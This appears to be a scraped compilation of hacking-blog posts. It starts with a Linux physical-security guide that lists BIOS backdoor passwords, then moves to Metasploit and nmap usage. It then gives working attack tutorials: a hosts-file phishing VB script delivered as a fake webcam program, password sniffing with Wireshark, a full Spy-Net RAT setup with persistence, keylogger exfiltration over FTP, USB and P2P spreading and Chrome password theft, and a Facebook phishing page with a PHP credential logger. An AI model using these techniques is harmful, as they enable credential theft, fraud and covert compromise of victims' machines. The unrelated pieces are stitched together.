Physical Security

 

Physical Security

The first layer of security you need to take into account is the physical security of your computer systems. Who has direct physical access to your machine? Should they? Can you protect your machine from their tampering? Should you?
How much physical security you need on your system is very dependent on your situation, and/or budget.
If you are a home user, you probably don't need a lot (although you might need to protect your machine from tampering by children or annoying relatives). If you are in a lab, you need considerably more, but users will still need to be able to get work done on the machines. Many of the following sections will help out. If you are in an office, you may or may not need to secure your machine off-hours or while you are away. At some companies, leaving your console unsecured is a termination offense.
Obvious physical security methods such as locks on doors, cables, locked cabinets, and video surveillance are all good ideas, but beyond the scope of this document. :)

3.1. Computer locks

Many modern PC cases include a "locking" feature. Usually this will be a socket on the front of the case that allows you to turn an included key to a locked or unlocked position. Case locks can help prevent someone from stealing your PC, or opening up the case and directly manipulating/stealing your hardware. They can also sometimes prevent someone from rebooting your computer from their own floppy or other hardware.
These case locks do different things according to the support in the motherboard and how the case is constructed. On many PC's they make it so you have to break the case to get the case open. On some others, they will not let you plug in new keyboards or mice. Check your motherboard or case instructions for more information. This can sometimes be a very useful feature, even though the locks are usually very low-quality and can easily be defeated by attackers with locksmithing.
Some machines (most notably SPARC's and macs) have a dongle on the back that, if you put a cable through, attackers would have to cut the cable or break the case to get into it. Just putting a padlock or combo lock through these can be a good deterrent to someone stealing your machine.

3.2. BIOS Security

The BIOS is the lowest level of software that configures or manipulates your x86-based hardware. LILO and other Linux boot methods access the BIOS to determine how to boot up your Linux machine. Other hardware that Linux runs on has similar software (Open Firmware on Macs and new Suns, Sun boot PROM, etc...). You can use your BIOS to prevent attackers from rebooting your machine and manipulating your Linux system.
Many PC BIOSs let you set a boot password. This doesn't provide all that much security (the BIOS can be reset, or removed if someone can get into the case), but might be a good deterrent (i.e. it will take time and leave traces of tampering). Similarly, on S/Linux (Linux for SPARC(tm) processor machines), your EEPROM can be set to require a boot-up password. This might slow attackers down.
Another risk of trusting BIOS passwords to secure your system is the default password problem. Most BIOS makers don't expect people to open up their computer and disconnect batteries if they forget their password and have equipped their BIOSes with default passwords that work regardless of your chosen password. Some of the more common passwords include:
j262 AWARD_SW AWARD_PW lkwpeter Biostar AMI Award bios BIOS setup cmos AMI!SW1 AMI?SW1 password hewittrand shift + s y x z
I tested an Award BIOS and AWARD_PW worked. These passwords are quite easily available from manufacturers' websites and http://astalavista.box.sk and as such a BIOS password cannot be considered adequate protection from a knowledgeable attacker.
Many x86 BIOSs also allow you to specify various other good security settings. Check your BIOS manual or look at it the next time you boot up. For example, some BIOSs disallow booting from floppy drives and some require passwords to access some BIOS features.
Note: If you have a server machine, and you set up a boot password, your machine will not boot up unattended. Keep in mind that you will need to come in and supply the password in the event of a power failure. ;(

3.3. Boot Loader Security

The various Linux boot loaders also can have a boot password set. LILO, for example, has password and restricted settings; password requires password at boot time, whereas restricted requires a boot-time password only if you specify options (such as single) at the LILO prompt.
>From the lilo.conf man page:

password=password The per-image option `password=...' (see below) applies to all images. restricted The per-image option `restricted' (see below) applies to all images. password=password Protect the image by a password. restricted A password is only required to boot the image if parameters are specified on the command line (e.g. single).

Keep in mind when setting all these passwords that you need to remember them. :) Also remember that these passwords will merely slow the determined attacker. They won't prevent someone from booting from a floppy, and mounting your root partition. If you are using security in conjunction with a boot loader, you might as well disable booting from a floppy in your computer's BIOS, and password-protect the BIOS.
Also keep in mind that the /etc/lilo.conf will need to be mode "600" (readable and writing for root only), or others will be able to read your passwords!
>From the GRUB info page: GRUB provides "password" feature, so that only administrators can start the interactive operations (i.e. editing menu entries and entering the command-line interface). To use this feature, you need to run the command `password' in your configuration file (*note password::), like this:
password --md5 PASSWORD
If this is specified, GRUB disallows any interactive control, until you press the key
and enter a correct password. The option `--md5' tells GRUB that `PASSWORD' is in MD5 format. If it is omitted, GRUB assumes the `PASSWORD' is in clear text.
You can encrypt your password with the command `md5crypt' (*note md5crypt::). For example, run the grub shell (*note Invoking the grub shell::), and enter your password:
grub> md5crypt Password: ********** Encrypted: $1$U$JK7xFegdxWH6VuppCUSIb.
Then, cut and paste the encrypted password to your configuration file.
Grub also has a 'lock' command that will allow you to lock a partition if you don't provide the correct password. Simply add 'lock' and the partition will not be accessable until the user supplies a password.
If anyone has security-related information from a different boot loader, we would love to hear it. (grub, silo, milo, linload, etc).
Note: If you have a server machine, and you set up a boot password, your machine will not boot up unattended. Keep in mind that you will need to come in and supply the password in the event of a power failure. ;(

3.4. xlock and vlock

If you wander away from your machine from time to time, it is nice to be able to "lock" your console so that no one can tamper with, or look at, your work. Two programs that do this are: xlock and vlock.
xlock is a X display locker. It should be included in any Linux distributions that support X. Check out the man page for it for more options, but in general you can run xlock from any xterm on your console and it will lock the display and require your password to unlock.
vlock is a simple little program that allows you to lock some or all of the virtual consoles on your Linux box. You can lock just the one you are working in or all of them. If you just lock one, others can come in and use the console; they will just not be able to use your virtual console until you unlock it. vlock ships with RedHat Linux, but your mileage may vary.
Of course locking your console will prevent someone from tampering with your work, but won't prevent them from rebooting your machine or otherwise disrupting your work. It also does not prevent them from accessing your machine from another machine on the network and causing problems.
More importantly, it does not prevent someone from switching out of the X Window System entirely, and going to a normal virtual console login prompt, or to the VC that X11 was started from, and suspending it, thus obtaining your privileges. For this reason, you might consider only using it while under control of xdm.

3.5. Security of local devices

If you have a webcam or a microphone attached to your system, you should consider if there is some danger of a attacker gaining access to those devices. When not in use, unplugging or removing such devices might be an option. Otherwise you should carefully read and look at any software with provides access to such devices.

3.6. Detecting Physical Security Compromises

The first thing to always note is when your machine was rebooted. Since Linux is a robust and stable OS, the only times your machine should reboot is when you take it down for OS upgrades, hardware swapping, or the like. If your machine has rebooted without you doing it, that may be a sign that an intruder has compromised it. Many of the ways that your machine can be compromised require the intruder to reboot or power off your machine.
Check for signs of tampering on the case and computer area. Although many intruders clean traces of their presence out of logs, it's a good idea to check through them all and note any discrepancy.
It is also a good idea to store log data at a secure location, such as a dedicated log server within your well-protected network. Once a machine has been compromised, log data becomes of little use as it most likely has also been modified by the intruder.
The syslog daemon can be configured to automatically send log data to a central syslog server, but this is typically sent unencrypted, allowing an intruder to view data as it is being transferred. This may reveal information about your network that is not intended to be public. There are syslog daemons available that encrypt the data as it is being sent.
Also be aware that faking syslog messages is easy -- with an exploit program having been published. Syslog even accepts net log entries claiming to come from the local host without indicating their true origin.
Some things to check for in your logs:

• Short or incomplete logs.
• Logs containing strange timestamps.
• Logs with incorrect permissions or ownership.
• Records of reboots or restarting of services.
• missing logs.
• su entries or logins from strange places.

Install Metasploit In Ubuntu lucid 10.4

Metasploit provides useful information and tools for penetration 
testers, security researchers, and IDS signature developers.
  This project was created to provide information on exploit techniques 
and to create a functional knowledgebase
  for exploit developers and security professionals. The tools and 
information on this site are provided for legal security
  research and testing purposes only. Metasploit is an open source 
project managed by Rapid7.
  

Install Metasploit In Ubuntu lucid 10.4

Install the Ruby dependencies:
sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems

Install the Subversion client :

$ sudo apt-get build-dep ruby
$ sudo apt-get install ruby-dev libpcap-dev 

Database support

$ sudo apt-get install rubygems libsqlite3-dev
$ sudo gem install sqlite3-ruby
$ sudo apt-get install rubygems libmysqlclient-dev
$ sudo gem install mysql

Download Metasploit From

http://www.metasploit.com/framework/download/

To dwonalod  the artical in doc click here 

To watch video tutorial from here 

Desktop phishing

TH3 Professional Security ™

TH3-pro.blogspot.com

By Mr Raghib Amine

PHISHING : DESKTOP PHISHING

Summary 1- Disclaimer 2 - Phishing ? 3-What is desktop phishing ? 4- How it's work ? 5- What is Hostfile in windows ? 6-Example 7 -How can this attack can be allocatable ? 8- Credit

Disclamer What is THe Professional security or TH3-pro.blogspot.Com? TH3-pro.blogspot.Com is definitely not a site that promotes or encourages computer hacking (unethical), but rather it is a Computer Security related website. In fact, Computer Hacking and Computer Security are the two concepts that goes hand-in-hand. They are like the two faces of the same coin. So with the existence of close proximity between Hacking and Security, it is more likely that people often mistake our site to be one that promotes Hacking. But in reality, our goal is to prevent hacking. We believe that unless you know how to hack (ethically), you cannot defend yourself from malicious hack attacks. Know Hacking but No Hacking! Your usage of this website constitutes your agreement to the following terms. 1. All the information provided on this site are for educational purposes only. The site is no way responsible for any misuse of the information. 2. “ TH3 professional security” is just a term that represents the name of the site and is not a site that provides any illegal information. TH3-pro.blogspot.Com is a site related to Computer Security and not a site that promotes hacking/cracking/software piracy. 3. This site is totally meant for providing information on “Computer Security” “Computer Programming” and other related topics and is no way related towards the terms “CRACKING” or “HACKING” (Unethical). 4. Few articles (posts) on this site may contain the information related to “Hacking Passwords” or “Hacking Email Accounts” (Or Similar terms). These are not the GUIDES of Hacking. They only provide information about the legal ways of retrieving the passwords. You shall not misuse the information to gain unauthorised access. However you may try out these hacks on your own computer at your own risk. Performing hack attempts (without permission) on computers that you do not own is illegal. 5. The virus creation section on this site provides demonstration on coding simple viruses using high level programming languages. These viruses are simple ones and cause no serious damage to the computer. However we strongly insist that these information shall only be used to expand programming knowledge and not for causing malicious attacks. 6. All the information on this site are meant for developing Hacker Defense attitude among the users and help preventing the hack attacks. Gohacking.Com insists that these information shall not be used for causing any kind of damage directly or indirectly. However you may try these codes on your own computer at your own risk. 7. The word “Hack” or “Hacking” that is used on this site shall be regarded as “Ethical Hack” or “Ethical Hacking” respectively. 8. We believe only in White Hat Hacking. On the other hand we condemn Black Hat Hacking. 8. Most of the information provided on this site are simple computer tricks (may be called by the name hacks) and are no way related to the term hacking. 9. Some of the tricks provided by us may no longer work due to fixture in the bugs that enabled the exploits. We are not responsible for any direct or indirect damage caused due to the usage of the hacks provided on this site. 10. The site holds no reponsiblity for the contents found in user comments and forum since we do not monitor them. However we may remove any sensitive information present in the user comments or on the forum upon request. 11. We reserve the right to modify the Disclaimer at any time without notice. This documentation is joined with a video you can found it in youtube channel youtube/oxiiiiid or our tv TH3.blip.tv

2 What Is Phishing ?

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging,[1] and it often
directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require tremendous skill to detect that the website is fake. Phishing is an example of social engineering techniques used to fool users,[2] and exploits the poor usability of current web security technologies.[3] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

A phishing technique was described in detail in 1987, and the first recorded use of the term "phishing" was made in 1996. The term is a variant of fishing,[4] probably influenced by phreaking,[5][6] and alludes to baits used to "catch" financial information and passwords. Wikipidia

1) what is desktop phishing ?

Salamo Alaykoum . Desktop Phishing is one more method of Phishing useful to hack email account passwords. Not only email passwords, but you can hack any account password of site you want. Attacker has to send phisher to victim to his in box and you have to wait for victim to login with out sent Phisher.

But, in Desktop Phishing, you only have to send the Phisher Arm (If it's phisher in phishing, we call it phisher arm in Desktop Phishing). You have to run server on your computer and save fake page of the website you wanna hack password, in directory of this server.

2) how it's work ?

Like you see in diagram pic in desktop phishing the victim are not directly linked to the fake page but is redirected to the fake page by using something called hostfile in windows

3)What is Hostfile in windows ?

The hosts file is a computer file used in an operating system to map hostnames to IP addresses. This method is one of several system facilities to address network nodes on a computer network. On some operating systems, the host file content is used preferentially over other methods, such as the Domain Name System (DNS), but many systems implement name service switches to provide customization. Unlike DNS, the hosts file is under the control of the local computer's administrator (wiki)

the attacker with some way like we will see in this tutorial can change the host file by changing or adding a wrong Dns value DNS linked to a web site by an other related to the fake page

4)How ? (example)

take of Example that the Ip address of www.paypal.com is 88.55.266.4

and the attacker has a server with a fake page of paypal uploaded in and the ip address of server is 255.56.77.89 so the attacker will add

www.paypal.com 255.56.77.89

then the victim when he will put http://www.paypal.com the address bar normally the browser will look for the ip address of this by looking first in hostfile in windows will not redirect to 88.55.266.4 but it will redirect to the attacker server 255.56.77.89

more than that the address will not change I mean that www.paypal.com it will stay and it will not change also the victim will not pay attention that he is on a fake website or a page

From here you will understand the danger of hostfile in windows

5) How can this attack can be allocatable ?

Simply you can use a large script that can aplicate this attack for me or like you see in video I use a fake program that I prompte to user to click to see the webcam of camera by clicking the program will put some fake ip address related to some fake servers that I have

VB script Code:

Open "c:\windows\system32\drivers\etc\hosts" For Output As #1 Print #1, "127.0.0.1 localhost" Print #1, "127.0.0.1 th3-pro.blogspot.com" Close #1

TH3- END

Credit

TH3 professional security TM

copyright 2010©

Raghib Amine

BlOG : TH3-pro.blogspot.com

YOUTBE : Youtube.com/oxiiiiid

FACEBOOK:facebook.com/TH3.prof

TV: TH3.blip.TV

E-mail : redhat@hotmail.fr

PHONE : +212678324021

Download documentation from
http://www.ziddu.com/download/10481575/dekstopphishing.doc.html


see or video also in

from

http://blip.tv/file/3812654

Work In internet out from home

you looking to make some money you have some free time and you wanna profite of it to work out from your home ,odesk company can realise your dream and be true no more fake web sites no blabla watch out Episode to know more how it's work

maded by rahgib amine

link to video

http://blip.tv/file/3809982

link of odesk website

http://www.odesk.com

happy watching

:)

How to identify Open Ports in ubuntu with nmap

Nmap is a utility for network exploration or security auditing. It supports ping scanning (determine which hosts are up), many port scanning techniques, version detection (determine service protocols and application versions listening behind ports), and TCP/IP fingerprinting (remote host OS or device identification).

Nmap also offers flexible target and port specification, decoy/stealth scanning, sunRPC scanning, and more. Most Unix and Windows platforms are supported in both GUI and commandline modes. Several popular handheld devices are also supported, including the Sharp Zaurus and the iPAQ.
Install nmap in ubuntu

sudo apt-get install nmap

Nmap examples

Here are some Nmap usage examples, from the simple and routine to a little more complex and esoteric. Some actual IP addresses and domain names are used to make things more concrete. In their place you should substitute addresses/names from your own network.. While I don’t think port scanning other networks is or should be illegal, some network administrators don’t appreciate unsolicited scanning of their networks and may complain. Getting permission first is the best approach.

For testing purposes, you have permission to scan the host scanme.nmap.org. This permission only includes scanning via Nmap and not testing exploits or denial of service attacks. To conserve bandwidth, please do not initiate more than a dozen scans against that host per day. If this free scanning target service is abused, it will be taken down and Nmap will report Failed to resolve given hostname/IP: scanme.nmap.org. These permissions also apply to the hosts scanme2.nmap.org, scanme3.nmap.org, and so on, though those hosts do not currently exist.

nmap -v scanme.nmap.org

This option scans all reserved TCP ports on the machine scanme.nmap.org . The -v option enables verbose mode.

nmap -sS -O scanme.nmap.org/24

Launches a stealth SYN scan against each machine that is up out of the 256 IPs on “class C” sized network where Scanme resides. It also tries to determine what operating system is running on each host that is up and running. This requires root privileges because of the SYN scan and OS detection.

nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127

Launches host enumeration and a TCP scan at the first half of each of the 255 possible eight-bit subnets in the 198.116 class B address space. This tests whether the systems run SSH, DNS, POP3, or IMAP on their standard ports, or anything on port 4564. For any of these ports found open, version detection is used to determine what application is running.

nmap -v -iR 100000 -Pn -p 80

Asks Nmap to choose 100,000 hosts at random and scan them for web servers (port 80). Host enumeration is disabled with -Pn since first sending a couple probes to determine whether a host is up is wasteful when you are only probing one port on each target host anyway.

sniff paswords using wireshark

TH3 Professional security

TH3-pro.blogspot.com

by Mr Raghib Amine

sniffing : wireshark

About This Documentation This documentation is joined with a video you can found it in youtube channel youtube/oxiiiiid or our tv TH3.blip.tv

Phase 1 Download wireshark From

http://www.wireshark.org/download.html

Or In debian

sudo apt-get install wireshark

Phase 2 Run wireshark

In Linux (debian)

sudo wireshark

In Windows double Click In wireshark icone

Phase 2 configure

just chose your interface (eth0) by double and click

phase 3 How To sniff

to start sniffing Http Protocol just type in filter (http) and white to someone connect on his/here account and you will see his/here passwords it may be can crypt ed so you need a md5 cracker to crack his/here password

TH3- END

E-mail : redhat@hotmail.fr


download the documontation
click here


See the video from youtube *


click here 

video in arabic language 

[TUT] Verify a Paypal in ANY Country!!!

I see a lot of People on the Forum asking "How can I Verify my UK Paypal? Not an American", so today I will answer those problems with this Simple Technique.

This will involve setting up an American Paypal though, but thats part of the Verification.

Step 1:

Visit this Thread and make a Verified Paypal Account: (No Credits go to me for this part of the Tut)

http://www.sythe.org/showthread.php?t=638933

Step 2:

Go to your Profile, then go to Currencies:



Step 3:

Select GBP, then follow the Numbers 1,2,3,4,5 in order:



You now have a Verified UK Paypal Account!!

Hope you liked the TUT, please do not redistribute

Spy-Net 2.6 RAT - Full Setup Tutorial

This tutorial is written by "I Used To Make Out With" aKa Edward Butcher for Hackforums.net
If you're going to leech it credit please

Tutorial is noob friendly!





Requirements

-Win XP,vista or 7
-Spy-Net RAT v2.6
-No Ip (Dynamic DNS)
-Fud crypter/protector or hexing skills (optional)

DOWNLOAD LINK
http://www.speedyshare.com/files/2154747...utcher.rar




Warning: This tutorial is written for educational purposes ONLY!





--------------------------------------------------------
--------------------------------------------------------
--------------------------------------------------------
--------------------------------------------------------
Chapter 1 - Spy Net Options
--------------------------------------------------------
--------------------------------------------------------
--------------------------------------------------------
--------------------------------------------------------

I believe that 90 % of people know how to setup a No-Ip and how to Port forward a 81 Port or any other you want!
So I will skip that part.

First of all Open spynet 2.6
Msgbox will popup with options "Yes" or "No" click no
Click "START" in the upper left corner
Now go "Opciones" and "Seleccionar Idoma"


Click "English.ini"



Now everything is on English language
Now we need to put the ports we want to use
Go "Options" > "Select listening ports"
Add port 81 and click ok

Now you should see in the middle bottom corner
"Waiting for connections on port : 81"

That's it for options


--------------------------------------------------------
--------------------------------------------------------
--------------------------------------------------------
--------------------------------------------------------
Chapter 2 - Setting up a server
--------------------------------------------------------
--------------------------------------------------------
--------------------------------------------------------
--------------------------------------------------------

This is the most important part of tutorial
Go File and click "Create Server"

Make a new user and name it however you want
Now pick your username and click "Forward"

Connection
Delete 127.0.0.1 DNS and click "Add" and insert

yournoiphost:81
example: jeremyjackson123.no-ip.biz:81

Click OK
Fill in Identification and Password and switch to Installation

Installation
Installation directory:

System = system32 folder
windows = windows folder
etc...

Put system
Rename directory into something not so obvious like "Microsoft_KB57H43"
or any random name
Rename File name into something not so obvious again something with windows or microsoft. Make sure after that your filename is ending with .exe


Leave injection into Default browser or if you want to inject your server into any other exe then you must know the process name,
example if you want to inject it in opera browser "opera.exe'

On boot check all
Don't rename nothing and click that "Random" button" few times

Check Persistance
Check Hide File
Check Change creation date
Do whatever you want with melt

HINT: What is melt?
If you check melt this will happen = when somone opens your server it will dissapear from their pc
if you don't check melt this will happen = when somone opens your server file will stay on their pc

So pick whatever you want for melt
If you need help check the picture


Move to Message
I personally don't use that option because I like binding files and hiding them well.

HINT:What is Message?
When somone open your server they will get the fake message
(Mostly used for files that are not binded)

If you will use the fake message option make sure it's a well hidden error
like "Failed to initialize" then some famous erorr number just google some if you don't know any

You can put whatever you want, if you want.

Move on to Keylogger
Check activate keylogger
Delete backspace (it's really irritating but helpful so pick what you want i never read any logs or use keyloggers)

Send logs by FTP
Could be useful for some people, i don't use it but i'll explain how to setup it
You need FTP
A good one is drivehq google and register
Send to: http://ftp.drivehq.com
Directory:/Logs (make sure you create a folder called Logs on your ftp)
FTP User: your drivehq username
FTP Password: your drivehq password
Send each: 30 minute is just fine

Make sure to test this if you're going to use it

Move on to Anti Options
Check all and move on "Create Server"

This is the last one

Check icon if you want
Check UPX
Check P2P (Peer to peer) like Limewire,Bearshare,Mp3 Rocket etc..
rename it into something with porn or cracks or games
Hot_Porn_2009.exe#callofduty6.exe#

HINT:Make sure to leave # behind .exe! else it wont work

Check USB (infecting everything that plugs in USB of infected pc)
Check Google Chrome Passwords and click ok when prompted for http://www.server.com/sqlite3.dll
Uncheck Bind files better use some private binder or something else
Uncheck Rootkit (experienced users can check)

Need help check the picture below



Click "Create Server" and you're done!

How to hack facebook password

Learn to hack facebook passwords

Are you curious to "hack facebook password" well then this post is just for you,Most people ask me to tell us the easiest way to hack facebook password,so here are some ways to hack facebook password:

1.Fake login page
2.Keylogging
3.Facebook new features
4.virus

Update:Due to recent complains i have elobrated the post and change the login script please check it out

Today we will focus on the easiest way i.e Fake login page
A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.



First of all download facebook fake login page:

PROCEDURE:

1.once you have downloded facebook fake loginpage now extract contents in a folder
2.In that ,find (CTRL+F) 'http://rafayhackingarticles.blogspot.com' then change it to your destined URL but don't forget '\'.
Save it .
3.Open Fake page in wordpad
4.Now press ctrl+F and search for the term "action=" now change its value to pass.php i.e. action=pass.php
5.Create an id in www.110mb.com , because i know about that site quite well.

6.Then upload the contents into a directory

7.For that,after creating an id you should go to file manager and upload all these files.

8.Then just got to Facebook.htm and try out whether its working .
After you type the file , a password file named pass.txt will be created in the same directory .
Then you can see what username and password you have entered.

Update:I have found another working php script you can also try this

header("Location: http://WEBSITE ");
$handle =

fopen("pass.txt", "a");
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, "=");

fwrite($handle, $value);
fwrite($handle,

"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;

In this way you can Hack a facebook password

Warning:This tutorial "How to hack facebook password " is for educational purposes

Hacking Windows XP

Get ready for some down-and-dirty hackin'! Over 200 serious hacks readers can use to force Windows XP to do it their way, written in the ExtremeTech no-holds-barred style.
Product Description
-Sinchak doesn't waste time tweaking Movie Maker or Instant Messenger-these hacks are heavy-duty, detailed instructions for squeezing every drop of power from Windows XP and maximizing speed, appearance, and security-Not for the
faint of heart! This book is written for users who aren't afraid to roll up their sleeves, risk voiding their warranties, take total control of the task bar, uninstall programs that are supposedly permanent, and beef up boot speed-Mines gems like unlocking hidden settings, customizing boot screens, supercharging online and program launch speed, maximizing the file system and RAM, and dumping hated features for good-Written by the creator of TweakXP.com, a site considered Mecca for Windows hackers and trusted by more than ten million Windows XP users worldwide.

Download

1000 Hacker Tutorials 2009 - Full Version

DOWNLOAD